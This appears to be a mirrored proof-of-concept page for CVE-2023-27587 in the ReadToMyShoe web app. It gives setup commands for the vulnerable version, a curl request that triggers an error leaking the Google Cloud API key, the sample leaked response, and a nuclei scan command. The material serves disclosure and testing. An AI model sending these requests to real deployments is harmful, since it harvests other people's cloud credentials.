关联漏洞
描述
The simple PoC of CVE-2023-27587
介绍
# CVE-2023-27587-PoC
The simple PoC of CVE-2023-27587
## What is ReadToMyShoe?
ReadtoMyShoe (RTMS) is a web application (rust, yew and axum) that lets you upload articles (via URL or via directly pasting) and listen to them later.
## Impact
If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key.
# PoC
#### Setup ReadtoMyShoe vulnerable
```
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul
```
#### Exploit
*The key is only exposed when an error occurs in the GCP call!*
```
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
-H 'Accept-Encoding: gzip, deflate' \
-H 'content-type: application/json' \
--data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'
```
#### Response error (exposed api key):
```
TTS failed: TTS request failed
Caused by:
HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)
```
### nuclei-template
https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml
```
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>
```
### References
https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587
https://beta.readtomyshoe.com/
文件快照
[4.0K] /data/pocs/5f7d62722d82ef86f4777bc1ccf5af50bcab78e1
├── [4.0K] nuclei-templates
│ └── [4.0K] cves
│ └── [4.0K] 2023
│ └── [1.6K] CVE-2023-27587.yaml
└── [1.9K] README.md
3 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。